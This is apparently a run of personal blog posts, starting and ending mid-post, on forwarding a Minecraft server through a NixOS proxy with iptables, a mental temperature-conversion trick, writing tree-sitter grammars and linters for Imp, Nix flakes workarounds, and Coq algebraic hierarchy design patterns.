[22:18:57] [Server thread/INFO]: Time elapsed: 2080 ms
[22:18:57] [Server thread/INFO]: Done (2.163s)! For help, type "help"
And let’s check if Minecraft can see it if I put in the Tailscale IP…
Great success! Now we just need to expose it to the public internet.
`iptables` essentially lets you configure the rules of the Linux kernel firewall. Conceptually it’s quite simple: the user defines tables, and when a packet comes in, it goes through chains of rules in those tables, so you can route the packet through essentially whatever treatment you like. Java Edition Minecraft servers use TCP port 25565 between the client and server.
It was very straightforward to enable IP forwarding and add 25565 to the list of open TCP ports for my server:
# combine with the rest of your configuration
{
boot.kernel.sysctl."net.ipv4.ip_forward" = 1;
networking.firewall.allowedTCPPorts = [ 25565 ];
}
Now we can go ahead and add the following commands to our firewall setup. Let dest_ip be the Tailscale IP of the server. The first command adds a rule to the PREROUTING chain, which is where packets arrive before being processed: it immediately forwards the packet over to the laptop pointed to by the IP address given by Tailscale. The second command masquerades the source IP of forwarded packets as the server’s own address, so return traffic from the laptop flows back through the server, which thus acts as a simple router.
# combine with the rest of your configuration
{
networking.firewall.extraCommands = ''
IPTABLES=${pkgs.iptables}/bin/iptables
"$IPTABLES" -t nat -A PREROUTING -p tcp --dport 25565 -j DNAT --to-destination ${dest_ip}:25565
"$IPTABLES" -t nat -A POSTROUTING -j MASQUERADE
'';
}
Now we have the following setup: clients connect to the proxy server’s public IP, and traffic is forwarded over Tailscale to the laptop running the Minecraft server.
Now we rebuild the server configuration, and checking again in Minecraft, this time using the public server IP, it all works as expected!
For the final touches *chef’s kiss*, adding an A record gave me a nice domain name I could give people instead of an IP address.
As far as performance goes, it’s pretty good! The proxy server is on the East coast and even though the Minecraft server is on the West coast, having played on it for several hours today, my friends and I had no problems whatsoever. I pinged people through the connection and latency was acceptable (77 ms for someone in New York).
Xe’s post on Tailscale, NixOS and Minecraft inspired me to write this; however, my requirements were different. I did not want to require my friends to install Tailscale to play on my server, and I wanted to leverage the existing hardware I had access to, essentially letting me use my server as a crappy router.
Various iptables tutorials and resources online helped me make sense of the terminology, commands and flags.
With this method, you get an immediate sense of the rough Celsius temperature for a given temperature in Fahrenheit, and if you calculate a bit more, the error is at most 0.25℃.
I memorize the following table. I recommend remembering that 50℉ corresponds to 10℃. Since Fahrenheit and Celsius have a linear relationship, a difference of 9℉ corresponds to a difference of 5℃. You can get the other numbers by adding as needed.
Fahrenheit | Celsius |
---|---|
32 | 0 |
41 | 5 |
50 | 10 |
59 | 15 |
68 | 20 |
77 | 25 |
86 | 30 |
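As a quick sanity check (mine, not from the post), every anchor in the table is an exact conversion, and adjacent rows differ by exactly 9℉ and 5℃ as claimed:

```python
# Each memorized anchor is an exact Fahrenheit-to-Celsius conversion,
# and consecutive anchors step by 9 F / 5 C.
table = [(32, 0), (41, 5), (50, 10), (59, 15), (68, 20), (77, 25), (86, 30)]
for f, c in table:
    assert (f - 32) * 5 / 9 == c
for (f1, c1), (f2, c2) in zip(table, table[1:]):
    assert f2 - f1 == 9 and c2 - c1 == 5
print("table consistent")
```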
Given a temperature \(T_F\), find the nearest anchor in the table, recall its Celsius value, then add half of the difference between \(T_F\) and the anchor. Here’s an example: to convert 75℉, the nearest anchor is 77℉, which is 25℃; half of 75 − 77 = −2 is −1, so the estimate is 24℃ (the exact value is about 23.9℃).
I can render the above steps into code so it’s unambiguous what I actually mean. Note that in the code I didn’t use a lookup table but instead some arithmetic to find the closest anchor point. Obviously in practice it’ll be memorized.
def convert_approx(given):
    # Nearest memorized temperature (anchors are 32, 41, ..., 86)
    close = round((given - 5) / 9) * 9 + 5
    # Convert the anchor to Celsius: each 9 F step is 5 C
    rough = (close - 32) // 9 * 5
    # Half of the difference
    diff = (given - close) / 2
    return rough + diff
First, observe that since the memorized anchors occur every 9℉, the difference between the given temperature and the nearest anchor is at most 9/2 ℉. The conversion slope is then approximated as 1/2 ℃/℉ instead of the exact 5/9 ℃/℉, so the worst-case error is:
\[\frac{9}{2}\left(\frac{5}{9}-\frac{1}{2}\right) = 0.25℃\]
That’s pretty much it. In summary, the conversion is: find the nearest anchor, recall its Celsius value, and add half of the remaining difference.
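To double-check the bound (my sketch, not from the post), we can compare the mental method against the exact formula for every whole-degree input between the anchors; the block re-includes the conversion function so it is self-contained:

```python
def convert_approx(given):
    close = round((given - 5) / 9) * 9 + 5  # nearest memorized anchor (32, 41, ..., 86)
    rough = (close - 32) // 9 * 5           # exact Celsius value of that anchor
    diff = (given - close) / 2              # half of the remaining difference
    return rough + diff

# Largest absolute error against the exact conversion over 32-86 F
worst = max(abs(convert_approx(f) - (f - 32) * 5 / 9) for f in range(32, 87))
print(worst)
```

For whole-degree inputs the worst case is 2/9 ≈ 0.22℃; the full 0.25℃ bound is only attained at inputs exactly halfway between anchors (4.5℉ away).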
If you’re converting temperature in the thousands of degrees and higher, you’re better off approximating it by multiplying by 2 to go from ℃ to ℉. It’s unlikely you want super precise conversions in that temperature range, and the temperatures essentially have a direct linear relationship in that range anyway.
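A quick numeric check of that claim (my sketch): at high temperatures the +32 offset is negligible next to the 9/5 slope, so doubling Celsius lands within roughly 11% of the exact Fahrenheit value:

```python
def exact_fahrenheit(c):
    # Exact conversion: F = 9/5 C + 32
    return c * 9 / 5 + 32

for c in (1000, 5000, 10000):
    rel_err = abs(2 * c - exact_fahrenheit(c)) / exact_fahrenheit(c)
    print(c, f"{rel_err:.1%}")  # relative error of the doubling shortcut
```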
This is a continuation of my last post on how to write a tree-sitter grammar in an afternoon. Building on the grammar we wrote, now we’re going to write a linter for Imp, and it’s even easier! The final result clocks in at under 60 SLOC and can be found here.
Recall that tree-sitter is an incremental parser generator. That is, you give it a description of the grammar of your programming language and it spits out a parser in C that creates a syntax tree based on the rules you specified. What’s notable about tree-sitter is that it is resilient in the presence of syntax errors, and being incremental means the parser is fast enough to reparse the file on every keystroke, changing only the parts of the tree that need it.
Specifically, we’ll write a program that suggests simplification of assignments and some conditional constructs. First I’ll describe the tree-sitter query language with some examples, then show how a little bit of JavaScript can let us manipulate the results programmatically. You can get the code in this post here. Ready? Set? Go!
Note: There are many language bindings that let you work with tree-sitter parsers using the respective language’s FFI. I’ve used only two to date, the Rust and the JavaScript bindings, and from my brief experience, the JavaScript bindings are much more usable. When using the Rust bindings the lifetime and mutability restrictions make abstraction more difficult, especially for a non-critical program such as a linter.
Tree-sitter has a built-in query language that lets you write queries to match parts of the AST of interest. Think of it as pattern matching, but you don’t need to handle every case of a syntactical construct.
Tree-sitter queries are written as a series of one or more patterns in an S-expression syntax. We first match on a node’s type (corresponding to a name of a node in the grammar file), then possibly the types of the children of the node as well. After each pattern, write @m (or any other valid capture name) so you can refer to the matched node later.
Our running example will be some Python code.
def factorial(n):
return 1 if n == 0 else (n * (1 * 1)) * factorial(n - 1)
Let’s match all expressions involving binary operators.
(binary_operator) @m
def factorial(n):
return 1 if n == 0 else (n * (1 * 1)) * factorial(n - 1)
Tree-sitter lets us specify what the children should be. So we can match all binary expressions involving at least one integer:
(binary_operator (integer)) @m
def factorial(n):
return 1 if n == 0 else (n * (1 * 1)) * factorial(n - 1)
Or match all binary expressions involving two integers:
(binary_operator (integer) (integer)) @m
def factorial(n):
return 1 if n == 0 else (n * (1 * 1)) * factorial(n - 1)
Try playing around with queries in the playground.
You can also assign capture names to nodes that you match, letting you refer to them later by name. This is useful because in the running example, suppose we wanted to capture the left and right integer arguments to a binary operator, labeling them a and b respectively. Then our query would look like this, and tree-sitter would highlight the matches accordingly.
(binary_operator (integer) @a (integer) @b) @m
def factorial(n):
return 1 if n == 0 else (n * (1 * 1)) * factorial(n - 1)
The tree-sitter query language also lets you specify additional constraints on matches. For instance, we can match on binary expressions where the left-hand side is n, which now gets highlighted in blue. The underscore _ lets us match any node.
((binary_operator _ @a _ @b) (#eq? @a n)) @m
def factorial(n):
return 1 if n == 0 else (n * (1 * 1)) * factorial(n - 1)
Now we have the basic parts out of the way, we can get to writing a linter! Instead of Python, we’ll continue working with Imp. Note that it’s easy to adapt this linter for any language with a tree-sitter grammar. Imp also has a much simpler semantics than Python so we can just focus on “obviously correct” lints rather than worry about suggestions changing program behavior.
We can start with a basic package.json:
{
"name": "imp-lint",
"type": "module",
"version": "1.0.0",
"description": "Linter for Imp",
"main": "index.js",
"scripts": {
"lint": "node index.js"
},
"author": "Ben Siraphob",
"license": "MIT",
"devDependencies": {
"tree-sitter": "^0.20.0",
"tree-sitter-imp": "github:siraben/tree-sitter-imp"
}
}
Then run npm install to install the dependencies. We’ll write our code in index.js, and then we can call our linter by running npm run lint <file>.
Nothing fancy here, just the Parser class from the tree-sitter library, our language definition Imp (discussed in my last blog post), and a library to read from the filesystem.
import Parser from "tree-sitter";
import Imp from "tree-sitter-imp";
import { readFileSync } from "fs";
const { Query } = Parser;
const parser = new Parser();
parser.setLanguage(Imp);
const args = process.argv.slice(2);
if (args.length != 1) {
console.error("Usage: npm run lint <file to lint>");
process.exit(1);
}
// Load the file passed as an argument
const sourceCode = readFileSync(args[0], "utf8");
We then create the parser, set the language to Imp and run the parser on our source code to get out a syntax tree.
const parser = new Parser();
parser.setLanguage(Imp);
// Parse the loaded source code into a syntax tree
const tree = parser.parse(sourceCode);
If we have the following file:
x := x + 1
The corresponding output from console.log(tree.rootNode.toString())
would be:
(program (stmt (asgn name: (id) (plus (id) (num)))))
That was some preliminary work. Now let’s see what queries would be interesting to run over more realistic Imp programs. Say we have:
z := x;
y := 1;
y := y;
while ~(z = 0) do
y := y * z;
z := z - 1;
x := x;
end;
x := x;
if x = y then x := 1 else x := 1 end
There are some redundancies for sure! We can tell the user about assignments such as x := x, which are no-ops, and that last if statement certainly looks redundant since both branches are the same statement.
It’s simple to create a Query object in JavaScript and run it over the root node.
const redundantQuery = new Query(
Imp,
"((asgn name: (id) @left _ @right) (#eq? @left @right)) @redundantAsgn"
);
console.log(redundantQuery.captures(tree.rootNode));
This is what we get:
[
{
name: 'redundantAsgn',
node: AsgnNode {
type: asgn,
startPosition: {row: 2, column: 0},
endPosition: {row: 2, column: 6},
childCount: 3,
}
},
{
name: 'left',
node: IdNode {
type: id,
startPosition: {row: 2, column: 0},
endPosition: {row: 2, column: 1},
childCount: 0,
}
},
// etc...
]
Ok, that’s a lot of detail! Notice that every capture name was reported along with what type of node matched and the start and end of the match. Some tools might want this information, but for us it’s enough to report only the start of the match and the text that the match corresponded to:
// Given a raw list of captures, extract the row, column and text.
function formatCaptures(tree, captures) {
return captures.map((c) => {
const node = c.node;
delete c.node;
c.text = tree.getText(node);
c.row = node.startPosition.row;
c.column = node.startPosition.column;
return c;
});
}
Now we get something more concise:
[
{ name: 'redundantAsgn', text: 'y := y', row: 2, column: 0 },
{ name: 'left', text: 'y', row: 2, column: 0 },
{ name: 'right', text: 'y', row: 2, column: 5 },
{ name: 'redundantAsgn', text: 'x := x', row: 6, column: 2 },
{ name: 'left', text: 'x', row: 6, column: 2 },
{ name: 'right', text: 'x', row: 6, column: 7 },
{ name: 'redundantAsgn', text: 'x := x', row: 8, column: 0 },
{ name: 'left', text: 'x', row: 8, column: 0 },
{ name: 'right', text: 'x', row: 8, column: 5 }
]
And of course, it’s trivial to filter out the captures corresponding to a given name:
// Get the captures corresponding to a capture name
function capturesByName(tree, query, name) {
return formatCaptures(
tree,
query.captures(tree.rootNode).filter((x) => x.name == name)
).map((x) => {
delete x.name;
return x;
});
}
Passing tree, redundantQuery and "redundantAsgn" to capturesByName, we get:
[
{ text: 'y := y', row: 2, column: 0 },
{ text: 'x := x', row: 6, column: 2 },
{ text: 'x := x', row: 8, column: 0 }
]
Now you can process these objects however you like. Note that tree-sitter uses zero-based indexing for the rows and columns, and you might want to offset it by one so users can locate it in their text editor. Here’s a simple approach:
// Lint the tree with a given message, query and match name
function lint(tree, msg, query, name) {
console.log(msg);
console.log(capturesByName(tree, query, name));
}
lint(tree, "Redundant assignments:", redundantQuery, "redundantAsgn");
We get the output:
Redundant assignments:
[
{ text: 'y := y', row: 2, column: 0 },
{ text: 'x := x', row: 6, column: 2 },
{ text: 'x := x', row: 8, column: 0 }
]
As a bonus, we can reuse our existing code for new queries! Here are a couple:
((if condition: _ @c consequent: _ @l alternative: _ @r)
(#eq? @l @r)) @redundantIf
((plus (num) @n) (#eq? @n 0)) @addzero
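Wiring these up reuses the same lint helper; here is a sketch assuming the Imp, Query, tree, and lint definitions from earlier in this post (the query strings are the ones just above):

```javascript
// Sketch: run the bonus queries through the same lint() helper as before.
const redundantIfQuery = new Query(
  Imp,
  `((if condition: _ @c consequent: _ @l alternative: _ @r)
    (#eq? @l @r)) @redundantIf`
);
lint(tree, "Redundant if statements:", redundantIfQuery, "redundantIf");

const addZeroQuery = new Query(Imp, "((plus (num) @n) (#eq? @n 0)) @addzero");
lint(tree, "Additions of zero:", addZeroQuery, "addzero");
```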
Here are some exercises to try:
- Write a lint that flags a redundant skip statement
To appreciate it more, think about what we would have done had we not used tree-sitter. The process might have gone something like this: pick a parsing library, define an abstract syntax tree annotated with source locations, write the parser, and finally walk the tree looking for patterns.
Note that there are several steps where things could go wrong or block us later. If we wrote the parser ourselves, say in Haskell using megaparsec, we would not have been able to recover the rows and columns of the syntax elements (or we’d painfully write an abstract data type with annotations). And even worse, what happens when the user supplies syntactically invalid input? Some parser generators based on GLR parsing, such as Bison, allow for error recovery, but then we’d need to define a custom error token and come up with ad-hoc logic for dealing with it.
Tree-sitter separates these design choices into orthogonal ones. A tree-sitter grammar is easy to write and reusable in any language with a C FFI. The error recovery logic is pervasive yet unwritten, and the resulting AST is annotated with locations and can be easily pattern-matched over with queries.
Should we throw tree-sitter at every problem involving parsing? No! There are certainly some areas where we need syntax trees without error nodes, and sometimes the incremental parsing is not necessary. For instance, if we’re working with a build farm, we don’t want to build package definitions with syntax errors!
Beyond linting, tree-sitter has also found applications in GitHub’s search-based code navigation which also makes use of the query language to annotate the AST with tags.
Every passing decade, it seems as if the task of implementing a new programming language becomes easier. Parser generators take the pain out of parsing and can give us informative error messages. Expressive type systems in the host language let us pattern-match over a recursive syntax tree with ease, letting us know if we’ve forgotten a case. Property-based testing and fuzzers let us test edge cases faster and more completely than ever. Compiling to intermediate languages such as LLVM gives reasonable performance to even the simplest languages.
Say you have just created a new language leveraging the latest and greatest technologies in programming language land. What should you turn your sights to next, if you want people to actually adopt and use it? I’d argue that it should be writing a tree-sitter grammar. Before I elaborate on what tree-sitter is, here’s what you’ll be able to achieve much more easily:
And the best part is that you can do it in an afternoon! In this post we’ll write a grammar for Imp, a simple imperative language, and you can get the source code here.
This post was inspired by my research in improving the developer experience for FORMULA and Spin.
Tree-sitter is a parser generator tool. Unlike other parser generators, it especially excels at incremental parsing, creating useful parse trees even when the input has syntax errors. And best of all, it’s extremely fast and dependency-free, letting you parse the entirety of the file on every keystroke in milliseconds. The generated parser is written in C, and there are many bindings to other programming languages, so you can programmatically walk the tree as well.
Imp is a simple imperative language often used as an illustrative example in programming language theory. It has arithmetic expressions, boolean expressions and different kinds of statements including sequencing, conditionals and while loops.
Here’s an Imp program that computes the factorial of x and places the result in y.
// Compute factorial
z := x;
y := 1;
while ~(z = 0) do
y := y * z;
z := z - 1;
end
Check out the official tree-sitter development guide.
If you’re using Nix, run nix shell nixpkgs#tree-sitter nixpkgs#nodejs-16-x to enter a shell with the necessary dependencies. Note that you don’t need to have it set up to continue reading this post, since I’ll provide the terminal output at appropriate points.
First we follow the grammar for expressions given in the chapter. Here it is for reference.
a := nat
| id
| a + a
| a - a
| a * a
| (a)
b := true
| false
| a = a
| a <= a
| ~b
| b && b
a corresponds to arithmetic expressions and b corresponds to boolean expressions.
The easiest things to handle are numbers and variables. We can add the following rules:
id: $ => /[a-z]+/,
nat: $ => /[0-9]+/,
The grammar for arithmetic expressions can easily be translated:
program: $ => $.aexp,
aexp: $ => choice(
/[0-9]+/,
/[a-z]+/,
seq($.aexp,'+',$.aexp),
seq($.aexp,'-',$.aexp),
seq($.aexp,'*',$.aexp),
seq('(',$.aexp,')'),
),
Let’s try to compile it! Here’s what tree-sitter outputs:
Unresolved conflict for symbol sequence:
aexp '+' aexp • '+' …
Possible interpretations:
1: (aexp aexp '+' aexp) • '+' …
2: aexp '+' (aexp aexp • '+' aexp)
Possible resolutions:
1: Specify a left or right associativity in `aexp`
2: Add a conflict for these rules: `aexp`
Tree-sitter immediately tells us that our rules are ambiguous; that is, the same sequence of tokens can have different parse trees. We don’t want ambiguity when writing code! Let’s make everything left-associative:
program: $ => $.aexp,
aexp: $ => choice(
/[0-9]+/,
/[a-z]+/,
prec.left(1,seq($.aexp,'+',$.aexp)),
prec.left(1,seq($.aexp,'-',$.aexp)),
prec.left(1,seq($.aexp,'*',$.aexp)),
seq('(',$.aexp,')'),
),
However, something’s not quite right when we parse 1*2-3*4: it’s being parsed as ((1*2)-3)*4, which is clearly a different interpretation! We can fix this by specifying prec.left(2,...) for *. The resulting parse tree we get is what we want.
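Concretely, the fixed rule raises the precedence level of * (a sketch; only the changed line matters):

```javascript
aexp: $ => choice(
  /[0-9]+/,
  /[a-z]+/,
  prec.left(1, seq($.aexp, '+', $.aexp)),
  prec.left(1, seq($.aexp, '-', $.aexp)),
  // higher precedence so * binds tighter than + and -
  prec.left(2, seq($.aexp, '*', $.aexp)),
  seq('(', $.aexp, ')'),
),
```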
Note that in many real language specs, the precedence of binary operators is given, so it becomes pretty routine to figure out the associativity and precedence to specify.
The grammars for boolean expressions and statements are similar, and can be found in the accompanying repository.
Phew, so now we have a grammar that tree-sitter compiles. How do we actually run it? The tree-sitter CLI has two subcommands to help out with this: tree-sitter parse and tree-sitter test. The parse subcommand takes a path to a file and parses it with the current grammar, printing the parse tree to stdout. The test subcommand runs a suite of tests defined in a very simple syntax:
===
skip statement
===
skip
---
(program
(stmt
(skip)))
The rows of equal signs denote the name of the test, followed by the program to parse, then a line of dashes followed by the expected parse tree.
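For instance, the assignment test from the suite might look like this (a sketch; the expected tree follows the asgn node shape from this grammar, with a name: field on the identifier):

```
===
assignment
===
x := 1
---
(program
  (stmt
    (asgn name: (id) (num))))
```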
When we run tree-sitter test, we get a check if a test passed and a cross if it failed, complete with a diff showing the expected vs. actual parse tree (to illustrate the error I replaced the example code with skip; skip instead):
tests:
✗ skip
✓ assignment
✓ prec
✓ prog
1 failure:
expected / actual
1. skip:
(program
(stmt
(seq
(stmt
(skip))
(stmt
(skip)))))
(skip)))
Believe it or not, that was pretty much all there is to writing a tree-sitter grammar! We can immediately put it to use by using it to perform syntax highlighting. Traditional syntax highlighting methods used in editors rely on regex and ad-hoc heuristics to colorize tokens, whereas since tree-sitter has access to the entire parse tree it can not only color identifiers, numbers and keywords, but also can do so in a context-aware fashion—for instance, highlighting local variables and user-defined types consistently.
The tree-sitter highlight command lets you generate syntax highlighting of your source code and render it in your terminal or output it to HTML.
Tree-sitter’s syntax highlighting is based on queries. Importantly, we need to assign highlight names to different nodes in the tree. We only need the following 5 lines for this simple language. The square brackets indicate alternations; that is, if any of the nodes in the tree match an item in the list, then assign the given capture name (prefixed with @) to it.
[ "while" "end" "if" "then" "else" "do" ] @keyword
[ "*" "+" "-" "=" ":=" "~" ] @operator
(comment) @comment
(num) @number
(id) @variable.builtin
And here is what tree-sitter highlight --html on the factorial program gives:
// Compute factorial
z := x;
y := 1;
while ~(z = 0) do
y := y * z;
z := z - 1;
end
Not bad! Operators, keywords, numbers and identifiers are clearly highlighted, and the comment being grayed out and italicized makes the code more readable.
Creating a tree-sitter grammar is only the beginning. Now that you have a fast, reliable way to generate syntax trees even in the presence of syntax errors, you can use this as a base to build other tools on. I’ll briefly describe some of the topics below but they really deserve their own blog post at a later date.
Syntax highlighting can become more informative semantically with tree-sitter. That is, we can have the syntax highlighter color local variable names one color, global variables another, distinguish between field access and method access, and more. Doing such nuanced highlighting using a regex-based highlighter is about as futile as trying to parse HTML with regex.
Tree-sitter grammars compile to a dynamic library which can be loaded into editors such as Emacs, Atom and VS Code on any platform (including WebAssembly). Using the extension mechanisms in each editor, you can build packages on top which can use the syntax tree for a variety of things, such as structural code navigation, querying the syntax tree for specific nodes (see screenshot), and of course syntax highlighting. Here’s an incomplete list of projects that use tree-sitter to enhance editing:
Tree-sitter has bindings in several languages. You can use this information and tree-sitter’s query language to traverse the syntax tree looking for specific patterns (or anti-patterns) in your programming language. To see this in action for Imp, see my minimal example of linting Imp with the JavaScript bindings. More details in a future post!
Parsing technology has come a long way since the birth of computer science almost a century ago (see this excellent timeline of parsing). We’ve gone from being unable to handle recursive expressions and precedence to LALR parser generators and now GLR and fast incremental parsing with tree-sitter. It stands to reason that the tools millions of developers use every day to look at their code should take advantage of such developments. We can do better than line-oriented editing or hacky regexps to transform and highlight our code. The future is structural, and perhaps tree-sitter will play a big role in it!
Nevertheless, this hermeticity comes with some downsides, especially when it comes to bandwidth, disk space and CPU usage. The reason is that Nixpkgs occasionally merges PRs that “rebuild the world”: for instance, staging-next cycles, or urgent updates to OpenSSL and other critical packages (which cause a rebuild in, say, Vim, because they affect the git derivation used to fetch it). Thus when you want to use a package that depends on an older or newer commit of Nixpkgs and some mass-rebuild PR landed in the intervening time, you’ll be faced with mass downloads of almost every dependency, most of which probably did not change in terms of build contents, but whose build environments differed enough that Nix considers them different.
After over a year of using flakes in practice, I’ve noticed certain ways in which I overcome these inconveniences, which I’ll elaborate below.
Note that this isn’t to say the hacks are without drawbacks. I’ll make it apparent in each hack what the benefits and drawbacks are.
Scenario: want to avoid a mass rebuild when trying to build an older project
Fix: override the nixpkgs input with a fixed reference
Drawbacks: might lose reproducibility, but it’s fine if the changes between the pinned commit and the overridden one weren’t major
Around a year ago, I started pinning my Nixpkgs registry. This lets me keep my flake reference to nixpkgs consistent across my systems (as opposed to using channels). This is good when running commands with nix run, so that instead of using the most up-to-date commit of Nixpkgs, it uses the pinned one from my system instead.
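For reference, pinning looks something like this (a sketch, not from the post; nix registry pin records the currently resolved revision of the flake reference):

```shell
# Pin the global registry entry for nixpkgs to its currently resolved commit
nix registry pin nixpkgs
# Inspect the result; the pinned entry now carries an exact rev
nix registry list
```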
I then deploy my server configuration using a simple tool. So when I want to update my server I run the following command
$ nix run github:winterqt/deploy -- siraben-land
[0/81 built, 1/0/14 copied (3.7/924.4 MiB), 1.0/161.4 MiB DL] fetching llvm-13.0.0-lib from https://cache.nixos.org
Huh? What does LLVM have to do with using the deployment tool? Why are there 81 rebuilds? Such scenarios are commonplace in my experience, due to the gap between the Nixpkgs commit a project pins and where Nixpkgs currently is. The solution is thus to override the flake input altogether. Many flake commands accept the --override-input flag, which takes two arguments: a path to override and the new flake reference to override it with. In the following command I’m overriding the input called nixpkgs with nixpkgs from my registry.
$ nix run github:winterqt/deploy --override-input nixpkgs nixpkgs -- siraben-land
warning: not writing modified lock file of flake 'github:winterqt/deploy':
• Updated input 'nixpkgs':
'github:NixOS/nixpkgs/5c37ad87222cfc1ec36d6cd1364514a9efc2f7f2' (2021-12-25)
→ 'github:NixOS/nixpkgs/a529f0c125a78343b145a8eb2b915b0295e4f459' (2022-01-31)
Notice that the reference to Nixpkgs went forward in time by a month. In this case, I avoided rebuilds and the server config deployed without any problems. Of course, the natural downside to this is that you might lose reproducibility if there were major changes between the two commits. In most non-critical cases, the resources and time saved are worth the risk.
Scenario: when working with a pre-flakes project, we want to be able to build a derivation specified with a given expression
Fix: pass the --impure flag
Drawbacks: could lead to larger closure sizes
In the world of Nix flakes, impure references to things such as the current directory are outright banned. For instance, suppose we’re on aarch64-darwin and we want to build GNU Hello for x86_64-darwin; before flakes we might run
$ nix-build -E 'with (import ./. {system="x86_64-darwin";}); hello'
So the Nix command equivalent would be
$ nix build --expr 'with (import ./. {system="x86_64-darwin";}); hello'
error: access to absolute path '/Users/siraben/Git/forks/nixpkgs' is forbidden in pure eval mode (use '--impure' to override)
(use '--show-trace' to show detailed location information)
As the error message suggests, we have to pass --impure to it, resulting in
$ nix build --impure --expr 'with (import ./. {system="x86_64-darwin";}); hello'
which succeeds as usual. Note that this might lead to increased closure sizes because a path reference results in the entire directory of the package being copied to the Nix store.
Scenario: want to build unfree packages or packages that are marked as broken for the current platform
Fix: set NIXPKGS_ALLOW_UNFREE=1 and pass --impure to nix build
Drawbacks: mostly harmless™
As an example, the math-comp book has a flake.nix file defined. So we might be tempted to try to build the book with flakes:
$ nix build github:math-comp/mcb
error: Package ‘math-comp-book’ in /nix/store/z5d23mcmv3va30nfkg1q40iz62xyi57a-source/flake.nix:36 has an unfree license (‘cc-by-nc-40’), refusing to evaluate.
a) To temporarily allow unfree packages, you can use an environment variable
for a single invocation of the nix tools.
$ export NIXPKGS_ALLOW_UNFREE=1
b) For `nixos-rebuild` you can set
{ nixpkgs.config.allowUnfree = true; }
in configuration.nix to override this.
Alternatively you can configure a predicate to allow specific packages:
{ nixpkgs.config.allowUnfreePredicate = pkg: builtins.elem (lib.getName pkg) [
"math-comp-book"
];
}
c) For `nix-env`, `nix-build`, `nix-shell` or any other Nix command you can add
{ allowUnfree = true; }
to ~/.config/nixpkgs/config.nix.
(use '--show-trace' to show detailed location information)
Unfortunately, in this case it’s not clear what the fix is. Even if you set that environment variable, you still get the same error message. Again harkening back to the philosophy of Nix flakes, querying environment variables is considered impure. The fix is to again pass the --impure flag while setting the environment variable at the same time.
$ NIXPKGS_ALLOW_UNFREE=1 nix build --impure github:math-comp/mcb && tree ./result
./result
└── share
└── book.pdf
There really isn’t any downside to this method, as far as I know. Unless environment variables you set in your shell also affect other aspects of the build, everything should be the same, and you’ll be able to run and build packages that were marked as broken or unfree previously.
Nix flakes isn’t to blame for these workarounds arising per se. In a sense, Nix becomes too pure, to the extent where resources are used when they don’t strictly need to be, especially for non-critical use cases. In the future, features such as a content-addressed store may help with issues such as mass rebuilds, where package hashes are determined by their build contents and not their input derivations.
From left to right, the structures can be roughly classified as pertaining to order theory, algebra and topology. For the object-oriented programmer: how many instances of multiple inheritance do you see?
It’s important to capture the way structures are organized in mathematics in a proof assistant with some uniform strategy, well-known in the OOP world as “design patterns.” In this article I will catalogue and explain a selection of various patterns and their strengths and benefits. They are (in order of demonstration):
For convenience as a reference, I will start with the most elegant and boilerplate-free patterns and end with the ugliest and most broken ones.
The running example will be a simple algebraic hierarchy: semigroup, monoid, commutative monoid, group, Abelian group. That should be elaborate enough to show how the approaches hold up in a more realistic setting. Here’s an overview of the hierarchy we’ll be building over a type A:
- add : A -> A -> A (a binary operation over A)
- addrA : forall x y z, add x (add y z) = add (add x y) z
- zero : A
- add0r : forall x, add zero x = x
- addr0 : forall x, add x zero = x
- addrC : forall (x y : A), add x y = add y x
- opp : A -> A (inverse function)
- addNr : forall x, add (opp x) x = zero (addition of an element with its inverse results in the identity)
You may also see ssreflect-style statements such as associative add.
Then, if all goes well, we will test the expressiveness of our hierarchy by proving a simple lemma, which makes use of a law from every structure.
(* Let A an instance of AbGroup, then the lemma holds *)
Lemma example A (a b : A) : add (add (opp b) (add b a)) (opp a) = zero.
Proof. by rewrite addrC (addrA (opp b)) addNr add0r addNr. Qed.
Reading: Type Classes for Mathematics in Type Theory
A well-known and vanilla approach is to use typeclasses. This goes very well: our declaration for AbGroup is just the constraints, similar to how it would be done in Haskell. However, pay special attention to the definition of AbGroup; there’s a ! in front of the ComMonoid constraint to expose the implicit arguments again, so that it can implicitly inherit the monoid instance from G.
Require Import ssrfun ssreflect.
Class Semigroup (A : Type) (add : A -> A -> A) := { addrA : associative add }.
Class Monoid A `{M : Semigroup A} (zero : A) := {
add0r : forall x, add zero x = x;
addr0 : forall x, add x zero = x
}.
Class ComMonoid A `{M : Monoid A} := { addrC : commutative add }.
Class Group A `{M : Monoid A} (opp : A -> A) := {
addNr : forall x, add (opp x) x = zero
}.
Class AbGroup A `{G : Group A} `{CM : !ComMonoid A}.
The example lemma is easily proved, showing the power of typeclass resolution in unifying all the structures.
Lemma example A `{M : AbGroup A} (a b : A)
: add (add (opp b) (add b a)) (opp a) = zero.
Proof. by rewrite addrC (addrA (opp b)) addNr add0r addNr. Qed.
See the accompanying gist for the instantiation of the structures over ℤ.
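To give a flavor of what instantiation looks like inline, here is a compact, hypothetical sketch (untested; the lemma and instance names are my own) over bool with xorb, which happens to form an Abelian group since every element is its own inverse. I show only the first two levels:

```coq
(* Assumes the Semigroup/Monoid classes above are in scope. *)
Lemma xorbA : forall x y z, xorb x (xorb y z) = xorb (xorb x y) z.
Proof. by move=> [] [] []. Qed.
Lemma xorFb : forall x, xorb false x = x. Proof. by case. Qed.
Lemma xorbF : forall x, xorb x false = x. Proof. by case. Qed.

Instance bool_semigroup : Semigroup bool xorb := { addrA := xorbA }.
Instance bool_monoid : Monoid bool false := { add0r := xorFb; addr0 := xorbF }.
```

The remaining instances (ComMonoid, Group with opp := id, and AbGroup) follow the same pattern.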
The Hierarchy Builder (HB) package is best described as a boilerplate generator, but in a good way! From a usability point of view, it is similar to typeclasses.
First we define semigroups. HB.mixin Record IsSemigroup A declares that we are about to define a predicate IsSemigroup over a type A, and the two entries in the record denote the binary operation and its associativity, respectively. We also define an infix notation for convenience.
From HB Require Import structures.
From Coq Require Import ssreflect.
(* Semigroup definition *)
HB.mixin Record IsSemigroup A := {
add : A -> A -> A;
addrA : forall x y z, add x (add y z) = add (add x y) z;
}.
HB.structure Definition Semigroup := { A of IsSemigroup A }.
(* Left associative by default *)
Infix "+" := add.
Next we define monoids. As with semigroups we use the mixin command, but now declare the inheritance with of IsSemigroup A. That is, for a type to be a monoid, it must be a semigroup first.
(* Monoid definition, inheriting from Semigroup *)
HB.mixin Record IsMonoid A of IsSemigroup A := {
zero : A;
add0r : forall x, add zero x = x;
addr0 : forall x, add x zero = x;
}.
HB.structure Definition Monoid := { A of IsMonoid A }.
Notation "0" := zero.
Now that we've seen two examples, there are no surprises left in how to define commutative monoids and groups.
(* Commutative monoid definition, inheriting from Monoid *)
